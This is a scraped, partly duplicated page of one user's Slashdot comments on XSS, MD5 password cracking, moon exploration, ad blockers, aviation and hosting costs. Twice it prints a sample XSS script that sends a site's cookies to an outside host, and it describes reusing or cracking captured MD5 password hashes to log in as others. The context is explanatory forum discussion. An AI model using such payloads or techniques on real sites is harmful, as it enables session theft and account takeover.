I'm speaking from personal experience here. Three weeks to brute-force all seven-character passwords from a set of 30 MD5-encoded passwords.
What if the intended target server is using https? Would the grabbing script {presumably ordinary http} get the encrypted or the plaintext version? If the browser thinks it's sending the form via https, then it has no reason to send out the unencrypted version - does it?
The big threat from XSS is that, assuming the site isn't using secure cookies, it doesn't matter if the browser and site are using HTTP or HTTPS -- an XSS attack will still be able to grab cookies or session IDs.
A basic XSS attack might look like <script>document.write('<img src="http://my.site.com/pixel.gif?' + document.cookies + '">')</script> which would send any cookies set by the site off to a third party.
If you inject the script into something that saves data across sessions (like a guestbook or forum), you'll hit yourself -- and everyone else who views the page!
Just because a password is MD5-encoded doesn't mean it's useless.
1) You can put the user ID and MD5-encoded password in your own cookies, and log in as the user. 2) You can find another site that user logs in on, find their user ID, and use the captured MD5 password to log in as them -- people tend to use the same password in many places 3) You can feed the MD5 password into a password cracker. If it's in a dictionary, you'll get the cleartext version in seconds; brute-forcing all possible 7-character passwords only takes a few weeks.
Re:Why we stopped going to the moon
on
The Case for the Moon
·
· Score: 3, Informative
I keep hearing this, but somehow no-one has EVER demonstrated a working system. If microwave power transmission is such a panacea, how come we have never seen it done here on earth!!!!!!
Because microwave transmission is line-of-sight, so you can't use it on Earth for distances longer than about fifty miles, and it's cheaper to use copper wire for runs that short.
Re:Minor factual error: no "darkside" of the moon
on
The Case for the Moon
·
· Score: 1
For radio astronomy, the far side is the dark side.
My extrapolation isn't correct. I fit a line to the last two data points, when I probably should have fit a logarithmic curve to all three points. That's not to say there isn't a limit -- it's just that my prediction is going about it the wrong way.
From the article: 150 nm, 382 GHz 100 nm, 452 GHz 75 nm, 509 GHz
At their current rate of improvement, a 680GHz device will have a collector size of 0 nm. Just imagine what will happen once they manage negative sizes!
In general, if someone has the ability to run a dictionary attack on a password, it's as good as giving them access. From personal experience as a sysadmin, 65%-75%(1) of all passwords can be found by a dictionary attack.
(1) From running dictionary attacks against three sets of passwords. Computer science students: 75% Public forum #1: 65% Public forum #2: 75%
Good greif, you can get a DEDICATED SERVER with over 42 GB of transfer per month (which you can spread over a year to average it out) FOR LESS THAT 30 UKP A MONTH! [and extra transfer is 1 UKP per GB].
Thank you for proving my point. Translating into US$, that's 42GB/month for about $45 a month -- $1 per GB.
He was complaining that the new airbusses actually land the plane for you-- the pilot only has to land every 10 or 12 times to make sure he remembers how.
And this is why I won't ride on an Airbus plane -- the autopilot can override the pilot.
About a decade back, there was an incident where an Airbus plane made a nice, perfectly controlled descent towards a Boston neighborhood, three miles from the airport. The pilot realized that the airplane was going to land short of the runway, and took over manual control of the landing. But the autopilot wouldn't let him land at the airport -- it thought he was overshooting the runway by three miles! After a few tries, the pilot was forced to land at a different airport -- one that the airplane was willing to admit existed.
I can't think of 2 people that -- honestly -- would NOT block ads and banners if it was just a click away.
Right off hand, I can think of one -- me.
I figure sites have the right to try to support themselves, as long as they don't do so in too annoying a fashion.
Java-based ads are out, since badly-written ones can bring a computer to a grinding halt (anyone remember "shock the monkey" and "punch the monkey"? Two of those on a page could slow a computer to unusability). Javascript-based ads are out for the similar reasons -- ever tried to use a web page when an ad was insisting on keeping itself under your mouse pointer? Pop-ups are out, since I'll never click on one, and pop-unders are out because the don't appear under the parent window, they bring the parent to the front (quite annoying if you're letting a large web page load in the background).
Animated GIFs and (reasonable) Flash are just fine. I've even clicked on a few, but ads for stuff I'm interested in are few and far between.
I'm a computer programmer. I can assure you, the average computer user is a total blockhead.
A few good assumptions to make when designing software: 1) Set the defaults to something useful. 90% of users will never change them, and 75% don't even know what a "preferences" dialog is. 2) Make clicking "Yes" the safe option. Users frequently don't read dialog boxes. 3) Don't give users any decision more complicated than a three-way choice, and if possible, make it a binary (on-off) choice. Anything more complicated just increases tech support calls.
Guess what? Most people won't even realize that the ad blocking is on, and even fewer will realize they can turn it off.
Because this particular product comes pre-installed (and presumably pre-activated) on many computers. Every other ad blocker has been something you need to actively decide to install on your computer.
No one knows how far the Oort cloud extends. The best estimates I've seen are that it extends halfway to the next star, at which point it becomes that star's Oort cloud.
Slashdot Mirror
I'm speaking from personal experience here. Three weeks to brute-force all seven-character passwords from a set of 30 MD5-encoded passwords.
What if the intended target server is using https? Would the grabbing script {presumably ordinary http} get the encrypted or the plaintext version? If the browser thinks it's sending the form via https, then it has no reason to send out the unencrypted version - does it?
The big threat from XSS is that, assuming the site isn't using secure cookies, it doesn't matter if the browser and site are using HTTP or HTTPS -- an XSS attack will still be able to grab cookies or session IDs.
A basic XSS attack might look like
<script>document.write('<img src="http://my.site.com/pixel.gif?' + document.cookies + '">')</script>
which would send any cookies set by the site off to a third party.
If you inject the script into something that saves data across sessions (like a guestbook or forum), you'll hit yourself -- and everyone else who views the page!
The biggest problem is figuring out what data needs to be escaped, and how. For example, did you know that you can place a working onMouseClick javascript in a tag? Instant "hyperlink"! What about in an tag? What attributes will you allow in an tag? How are you going about converting those [i] BBCode tags? Can someone sneak code in that way?
Just because a password is MD5-encoded doesn't mean it's useless.
1) You can put the user ID and MD5-encoded password in your own cookies, and log in as the user.
2) You can find another site that user logs in on, find their user ID, and use the captured MD5 password to log in as them -- people tend to use the same password in many places
3) You can feed the MD5 password into a password cracker. If it's in a dictionary, you'll get the cleartext version in seconds; brute-forcing all possible 7-character passwords only takes a few weeks.
I keep hearing this, but somehow no-one has EVER demonstrated a working system. If microwave power transmission is such a panacea, how come we have never seen it done here on earth!!!!!!
Because microwave transmission is line-of-sight, so you can't use it on Earth for distances longer than about fifty miles, and it's cheaper to use copper wire for runs that short.
For radio astronomy, the far side is the dark side.
My extrapolation isn't correct. I fit a line to the last two data points, when I probably should have fit a logarithmic curve to all three points. That's not to say there isn't a limit -- it's just that my prediction is going about it the wrong way.
From the article:
150 nm, 382 GHz
100 nm, 452 GHz
75 nm, 509 GHz
At their current rate of improvement, a 680GHz device will have a collector size of 0 nm. Just imagine what will happen once they manage negative sizes!
According to your list, it should be targeting the "low speed, long range" niche.
Only a million? Bluetooth is DEAD!
No mention of how this guy compares to the Australian who was arrested about a week back. I bet he's small potatoes as well.
The ones they should be going after are the ones in Nigeria -- the scam is the third largest source of foreign currency for that country.
I wonder if the same logic could be applied to charge spammers advertising spam blockers with extortion? How about HTML popup ads for popup blockers?
In general, if someone has the ability to run a dictionary attack on a password, it's as good as giving them access. From personal experience as a sysadmin, 65%-75%(1) of all passwords can be found by a dictionary attack.
(1) From running dictionary attacks against three sets of passwords.
Computer science students: 75%
Public forum #1: 65%
Public forum #2: 75%
Good greif, you can get a DEDICATED SERVER with over 42 GB of transfer per month (which you can spread over a year to average it out) FOR LESS THAT 30 UKP A MONTH! [and extra transfer is 1 UKP per GB].
Thank you for proving my point. Translating into US$, that's 42GB/month for about $45 a month -- $1 per GB.
He was complaining that the new airbusses actually land the plane for you-- the pilot only has to land every 10 or 12 times to make sure he remembers how.
And this is why I won't ride on an Airbus plane -- the autopilot can override the pilot.
About a decade back, there was an incident where an Airbus plane made a nice, perfectly controlled descent towards a Boston neighborhood, three miles from the airport. The pilot realized that the airplane was going to land short of the runway, and took over manual control of the landing. But the autopilot wouldn't let him land at the airport -- it thought he was overshooting the runway by three miles! After a few tries, the pilot was forced to land at a different airport -- one that the airplane was willing to admit existed.
I can't think of 2 people that -- honestly -- would NOT block ads and banners if it was just a click away.
Right off hand, I can think of one -- me.
I figure sites have the right to try to support themselves, as long as they don't do so in too annoying a fashion.
Java-based ads are out, since badly-written ones can bring a computer to a grinding halt (anyone remember "shock the monkey" and "punch the monkey"? Two of those on a page could slow a computer to unusability). Javascript-based ads are out for the similar reasons -- ever tried to use a web page when an ad was insisting on keeping itself under your mouse pointer? Pop-ups are out, since I'll never click on one, and pop-unders are out because the don't appear under the parent window, they bring the parent to the front (quite annoying if you're letting a large web page load in the background).
Animated GIFs and (reasonable) Flash are just fine. I've even clicked on a few, but ads for stuff I'm interested in are few and far between.
I'm a computer programmer. I can assure you, the average computer user is a total blockhead.
A few good assumptions to make when designing software:
1) Set the defaults to something useful. 90% of users will never change them, and 75% don't even know what a "preferences" dialog is.
2) Make clicking "Yes" the safe option. Users frequently don't read dialog boxes.
3) Don't give users any decision more complicated than a three-way choice, and if possible, make it a binary (on-off) choice. Anything more complicated just increases tech support calls.
Guess what? Most people won't even realize that the ad blocking is on, and even fewer will realize they can turn it off.
Could you provide us with a link to this study, please? Particularly for that last point.
So, how do you propose to pay for web hosting and bandwidth?
A good webhosting provider will run $1/month/100MB of space, and $1-$2/GB of transfer. If they're charging less, don't expect any sort of reliability.
For an effectively untargeted advertising medium, that's actually pretty good.
Because this particular product comes pre-installed (and presumably pre-activated) on many computers. Every other ad blocker has been something you need to actively decide to install on your computer.
No one knows how far the Oort cloud extends. The best estimates I've seen are that it extends halfway to the next star, at which point it becomes that star's Oort cloud.
Every probe that's gone past Mars has used nuclear thermal power. Solar panels don't produce enough power out beyond Mars orbit.
The problem is that 100 years is 98 years farther ahead than Congress is able to think, and 99 years longer than they are able to guarantee money for.
About 0.00143 light-years (or 12.5 light-hours).